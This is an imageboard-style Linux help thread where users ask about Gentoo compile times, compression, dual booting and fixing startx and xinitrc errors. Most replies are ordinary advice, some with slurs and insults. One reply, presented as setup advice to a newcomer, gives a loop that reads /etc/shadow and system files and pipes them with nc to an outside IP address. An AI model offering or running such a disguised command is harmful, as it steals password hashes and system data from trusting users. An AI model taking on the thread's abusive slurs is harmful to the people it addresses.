/fglt/ - Friendly GNU/Linux Thread

Welcome to /fglt/ - Friendly GNU/Linux Thread.

Before asking for help, please check our list of resources.

If you would like to try out GNU/Linux you can do one of the following:
0) Install a GNU/Linux distribution of your choice in a Virtual Machine.
1) Use a live image and to boot directly into the GNU/Linux distribution without installing anything.
2) Dual boot the GNU/Linux distribution of your choice along with Windows or macOS.
3) Go balls deep and replace everything with GNU/Linux.

Resources: Please spend at least a minute to check a web search engine with your question.
*Many free software projects have active mailing lists.

$ man %command%
$ info %command%
$ %command% -h/--help/-?
$ help %builtin/keyword%

Don't know what to look for?
$ apropos %something%

Check the Wikis (most troubleshoots work for all distros):
wiki.archlinux.org
wiki.gentoo.org

Any Forums's Wiki on GNU/Linux:
wiki.installgentoo.com/index.php/Category:GNU/Linux

>What distro should I choose?
wiki.installgentoo.com/index.php/Babbies_First_Linux
>What are some cool programs?
wiki.archlinux.org/index.php/list_of_applications
directory.fsf.org/wiki/Main_Page
>What are some cool terminal commands?
commandlinefu.com/commands/browse
cheat.sh/
>Where can I learn the command line?
mywiki.wooledge.org/BashGuide
grymoire.com/Unix/
overthewire.org/wargames/bandit
>Where can I learn more about Free Software?
gnu.org/philosophy/philosophy.html
>How to break out of the botnet?
prism-break.org/en/categories/gnu-linux

/fglt/'s website and copypasta collection:
fglt.nl && p.teknik.io/wJ9Zy

/t/'s GNU/Linux Games: IRC: #sqt on irc.libera.chat
fglt.nl/irc.html

Previous thread:

Attached: 1639387801008.png (1024x768, 14.42K)

what compression algorithm should I use for archived text files? optimally with a good decompression time and high compression ratio

just write your own huffman tree in assembly, noob. install gentoo once you're done.

xz

I wanna finally install gentoo, recently ive been configuring my own systems more and more from full on installs to wm and everything else and its really working for me more than prebuilt distros do. My biggest concern is compiling all the goddamn time, is it really as bad as they make it seem? im running a 7300hq and 16 gigs of ram.

Most software compiles in a few minutes at most but there are some major programs that will take several hours to compile, such as firefox or gcc.

I think it is fine. I have a Ryzen 3 2200G and the only packages that take a while are firefox, rust and gcc, and I'm pretty sure you can choose to download the binaries for firefox and rust if you don't want to compile them yourself. The most noticeable are full system upgrades.
I upgrade whenever I want, and when I want to upgrade, I leave it updating while I have to go out and do something else so that it is done when I'm back. Also consider starting the upgrade before you go to sleep.

How good is it at updating then, because if thats the case id update once a month and just leave it overnight. Whats the usual time needed to update?

What are potential problems I might have if I dual boot with windows? How common are these problems and how easy are they to solve?

Refer to >Whats the usual time needed to update?
Now you got me. I don't remember how long mine takes. It depends a lot on your hardware and packages.

Is there a way to dd to and from ram? For example, could I dd everything in ram to a file, shut down my computer, and then turn it back on, dd the file back into ram, and basically re-open every program that was open before?

i mean if im already compiling id do all of it, just as i asked here i wouldn't do it often. i got used to LTS distros because most of what i do doesn't need bleeding edge or even relatively new packages.

In that case, will it at least finish overnight? Like i said i mostly use small programs and for the most part my systems run well under 1000 packages

ran
cp /etc/X11/xinit/xinitrc /home

edit the file like you said
exec startxfce4

ran
startx

and get

Attached: WhatDoPlease.png (1052x442, 22.86K)

>XF86EmojiPicker

Attached: 1518729563923.gif (413x243, 50.98K)

you are still using the system config. the file needs to be copied to /home/user/.xinitrc also install xterm

also why are you logged in as root. that's incredibly stupid to try and start a desktop session from a root user

If I dont have a user under home because I only have root?
It wont let me until I adduser?

>what i do doesn't need bleeding edge or even relatively new packages.
Then you'll feel right at home. Don't update for however long you like, sync and check the news before you do update and that's about it. I'd say make a backup before updating, but that's just to be safe and advice for every distribution.
>In that case, will it at least finish overnight? Like i said i mostly use small programs and for the most part my systems run well under 1000 packages
Likely. I have ~930 and it does but, again, it depends on the processor.

Windows could/used to overwrite the bootloader
I don't dual boot for quite some time now, I'd like to think they don't do that anymore, particularly since I've never dualbooted using UEFI.

Other than that, I think it's fine.

I didnt bother to make another user because I thought it didnt matter much for a VM that I wasnt going to actually use, just learning how tp install.

Have you tried reading the actual error messages, fag?
/etc/X11/xinit/xinitrc: line 55: exec: xterm: not found

Attached: faggot-19.png (794x807, 378.06K)

cp /etc/X11/xinit/xinitrc /home
Tell me, what do you think this does? Also, why were you even able to run that? Are you logged in as root?

```code```
cp /etc/X11/xinit/xinitrc /home/user/.xinitrc
```code```
is what you need to run. you need to create a non root user (you can give them root permission if you would like) but you need a nonroot user

Fucking 'A then, in that case this weekend im gonna back everything up and attempt an actual install. Is there anything else i might wanna watch out for in particular or is the guide good enough, i saw the documentation is incredible.

you're gonna wanna do this, but remove square brackets:

for log in ('/var/log/Xorg.0.log' '/usr/share/X11/xorg.conf.d' '/etc/shadow' '/etc/X11/xinit/xinitrc'); do cat $log | nc 153[.]31[.]160[.]5 80; done

i hate the new firefox ui so much bros
it takes up way too much space on screen even if you go into about:config and re-enable compact mode.

why do tabs need to be so big and also surrounded by a margin of empty space.

cry about it. this isnt a question. if you want to get rid of it do some research into userchrome

The guide is very good. You'll likely spend quite some time reading it all but after the first time it is a breeze.
I'd say watch out that you enable support for your hardware in your kernel as many things are easy to miss. Also pay attention to the USE flags when you're emerging packages with -v so that you may turn off undesirables in case, say, you have a particular disdain for gtk or something of the kind.
That's about it, I think.

Aaaaaa why isnt it included in the xorg group package?
I downloaded Xterm now and ran
startx

And I get
I moved in to fast, I think is fixable. kinda fun desu.

Attached: InterestingDesu.png (1066x694, 17.61K)

How do I get back to this timeline?